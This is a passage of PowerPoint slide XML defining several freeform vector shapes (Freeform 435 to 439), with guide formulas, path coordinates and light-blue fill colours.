              <a:gd name="T35" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T43" fmla="*/ 0 h 80"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T45" fmla="*/ 0 h 80"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T47" fmla="*/ 0 h 80"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 80"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 80"/>
              <a:gd name="T80" fmla="*/ 18 w 18"/>
              <a:gd name="T81" fmla="*/ 80 h 8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 h="80">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="59B2FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10354" name="Freeform 435"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1509712" y="6924675"/>
            <a:ext cx="31750" cy="155575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T10" fmla="*/ 0 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T12" fmla="*/ 0 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 69"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 0 h 69"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 0 h 69"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 0 h 69"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 0 h 69"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T47" fmla="*/ 0 h 69"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T49" fmla="*/ 0 h 69"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 69"/>
              <a:gd name="T80" fmla="*/ 14 w 14"/>
              <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                <a:moveTo>
                  <a:pt x="5" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="72C6FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10355" name="Freeform 436"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="6937375"/>
            <a:ext cx="26987" cy="127000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T8" fmla="*/ 0 w 12"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T10" fmla="*/ 0 w 12"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T12" fmla="*/ 0 w 12"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 56"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T35" fmla="*/ 0 h 56"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T37" fmla="*/ 0 h 56"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T39" fmla="*/ 0 h 56"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T41" fmla="*/ 0 h 56"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T43" fmla="*/ 0 h 56"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T45" fmla="*/ 0 h 56"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T47" fmla="*/ 0 h 56"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T49" fmla="*/ 0 h 56"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 12"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 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
              <a:gd name="T79" fmla="*/ 0 h 56"/>
              <a:gd name="T80" fmla="*/ 12 w 12"/>
              <a:gd name="T81" fmla="*/ 56 h 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 h="56">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="8CD8FF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10356" name="Freeform 437"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1511300" y="6948488"/>
            <a:ext cx="22225" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 0 w 10"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 0 w 10"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T41" fmla="*/ 0 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T43" fmla="*/ 0 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T45" fmla="*/ 0 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T47" fmla="*/ 0 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 10"/>
              <a:gd name="T51" fmla="*/ 2147483647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
              <a:gd name="T79" fmla="*/ 0 h 45"/>
              <a:gd name="T80" fmla="*/ 10 w 10"/>
              <a:gd name="T81" fmla="*/ 45 h 4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 h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="A5EDFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10357" name="Freeform 438"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1516062" y="6962775"/>
            <a:ext cx="15875" cy="71438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T6" fmla="*/ 0 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T8" fmla="*/ 0 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T10" fmla="*/ 0 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T12" fmla="*/ 0 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T14" fmla="*/ 0 w 7"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 32"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T35" fmla="*/ 0 h 32"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T37" fmla="*/ 0 h 32"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T39" fmla="*/ 0 h 32"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T41" fmla="*/ 0 h 32"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T43" fmla="*/ 0 h 32"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T45" fmla="*/ 0 h 32"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T47" fmla="*/ 0 h 32"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T49" fmla="*/ 0 h 32"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 7"/>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32"/>
              <a:gd name="T80" fmla="*/ 7 w 7"/>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32">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="BFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10358" name="Freeform 439"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1730375" y="6888163"/>
            <a:ext cx="53975" cy="203200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T26" fmla="*/ 0 w 24"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T28" fmla="*/ 0 w 24"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 90"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 24"/>
              <a:gd name="T35" fmla="*/ 0 h 90"/>
